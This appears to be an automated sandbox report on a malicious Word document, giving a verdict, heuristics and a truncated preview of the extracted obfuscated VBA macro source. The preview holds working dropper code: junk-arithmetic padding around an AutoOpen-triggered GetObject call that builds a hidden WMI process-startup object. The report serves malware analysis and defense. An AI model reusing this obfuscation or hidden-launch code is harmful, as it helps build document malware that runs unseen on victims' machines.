Verdict: MALICIOUS
Risk score: 142

Malware Insights
MITRE ATT&CK: T1059.005 (Visual Basic)
The sample is an OLE document with a high degree of slack space, indicating potential obfuscation or embedded malicious content. It contains VBA macros, including an AutoOpen macro and a GetObject call, which are commonly used to initiate malicious actions. The VBA code itself is heavily obfuscated, making it difficult to determine the exact payload, but the presence of these elements strongly suggests an attempt to execute arbitrary code.
Heuristics (5)
- OLE document has large unaccounted-for region [high, OLE_SLACK_ANOMALY]: OLE file is 297,763 bytes but its declared streams total only 149,691 bytes; 148,072 bytes (50%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- VBA macros detected [medium, OLE_VBA_MACROS, 2 related findings]: Document contains VBA macro code.
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro.
- GetObject call [high, OLE_VBA_GETOBJ]: GetObject call.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 55392 bytes |

SHA-256: 0550af58b9103394042b414eb21ac33c67c332ef03c6c74510a4ccc6a976115a
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "X85417_" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "D_03_5" Function i_730465() If E41_095 <> d_76509 Then z_43_9 = 130863235 + CSng(840541501) * 850022055 * ChrB(615223107) * (h49_22_ / CDbl(147515605 + CBool(A659__ - Int(676909013 / d_2__4_ * 340996018 / Cos(r_011_9_)))) - (c909__ + Oct(901211603) + 883599116 / 325923667)) End If If i6143_6 <> h33__13 Then P_51_323 = 840532279 + CSng(87393782) * 721210847 * ChrB(631122044) * (W62_9272 / CDbl(956603762 + CBool(a___4395 - Int(886876212 / S89_2_2 * 277982380 / Cos(M6_6_18_)))) - (A_5564 + Oct(217531508) + 589271794 / 906727470)) End If If N242_65 <> b933474 Then p48_4802 = 441996626 + CSng(590772287) * 165264288 * ChrB(571197179) * (k__88_ / CDbl(47600158 + CBool(C185_7 - Int(880660109 / f2__17_0 * 429453048 / Cos(l0_06754)))) - (X__47__3 + Oct(737925077) + 589574350 / 561336517)) End If If i14_86_ <> u27_1_9 Then H3___633 = 254867046 + CSng(416848932) * 641652396 * ChrB(480501352) * (B0405__8 / CDbl(217858241 + CBool(B12338_ - Int(961402893 / j5_4__ * 366644712 / Cos(i_7462_)))) - (I39__2 + Oct(769064779) + 410567726 / 80929509)) End If If J_01__7 <> T15682 Then i4___0 = 36795034 + CSng(359122723) * 589451975 * ChrB(950989683) * (n46720 / CDbl(748742720 + CBool(P_198_0 - Int(901105834 / U97_0065 * 68292996 / Cos(G_30629_)))) - (T4965_55 + Oct(915821532) + 341680720 / 458016889)) End If If F5_9686 <> F9_2_2__ Then o332_9 = 817715664 + CSng(847558423) * 3988265 * ChrB(752115412) * (U09893_1 / CDbl(165712882 + CBool(O37915 - Int(144560744 / T885_44 * 4898321 / Cos(V_223376)))) - (w8393__ + Oct(229460174) + 35400180 / 766124744)) End If If l_7439 <> z953468_ Then F767_01 = 63723581 + CSng(308453595) * 481895254 * ChrB(86899840) * (d502___ / CDbl(913320070 + CBool(i2760_ - 
Int(352818717 / K07__4__ * 204883602 / Cos(i_9___)))) - (j398_6 + Oct(707055774) + 385407223 / 336890248)) End If End Function Function H01_633(t_18__7_, z333_2) On Error Resume Next If f35_08__ <> s39552 Then d0_305_ = 333764498 + CSng(546080739) * 155925477 * ChrB(467041407) * (F59___96 / CDbl(778024666 + CBool(Z2____08 - Int(447103720 / t_77116_ * 699953694 / Cos(f___764)))) - (p_3085 + Oct(900547614) + 614322087 / 691184905)) End If If O5_22653 <> I0437_2 Then R00_5__ = 265439246 + CSng(22853566) * 668823883 * ChrB(931525609) * (l371_23 / CDbl(744723803 + CBool(A1__9_1 - Int(834765491 / m_1997 * 364388892 / Cos(Q837__)))) - (W1_79130 + Oct(705935521) + 565451600 / 852686519)) End If If N_745_ <> L__954_ Then j4952430 = 676791271 + CSng(78581075) * 729320063 * ChrB(242167125) * (V105___ / CDbl(612964186 + CBool(s1_27_9 - Int(454705114 / u1_030 * 287900680 / Cos(t_60379)))) - (o_116171 + Oct(366281032) + 89846832 / 176526514)) End If Set B_97__5 = GetObject((i66_77 + "winmgm" + A_14283) + (T45____0 + "ts:Win" + l3_5394_) + "32_Proce" + "ssStartup") If q7__487 <> N940__0 Then R30422_ = 804853718 + CSng(199634731) * 424256448 * ChrB(918190968) * (j39_159 / CDbl(91484157 + CBool(f2042_ - Int(502028593 / T_82_85_ * 38943615 / Cos(B98__12)))) - (S74__237 + Oct(856429675) + 830395124 / 41156062)) End If If f_815_ <> W4__07 Then T770835 = 507575691 + CSng(899767250) * 571779514 * ChrB(938940833) * (Y9__9416 / CDbl(56134707 + CBool(W4_9115 - Int(470714304 / h8___7 * 484559743 / Cos(n_25_0)))) - (F4_351 + Oct(35186367) + 214135549 / 256163935)) End If If D8___7_ <> w9557_90 Then H52_8_2 = 975827306 + CSng(441955126) * 638573321 * ChrB(813169436) * (X19_827 / CDbl(291253534 + CBool(d24954 - Int(988112802 / A_91_86_ * 664287035 / Cos(W2_3_5_)))) - (f24228 + Oct(883720840) + 298256732 / 287846563)) End If B_97__5.ShowWindow = 528679 - 528679 If X4_95_51 <> D9_1893_ Then j1_5_93_ = 642779728 + CSng(311917796) * 117625815 * ChrB(788595687) * (P_594_ / CDbl(716905177 + 
CBool(X__571 - Int ... (truncated)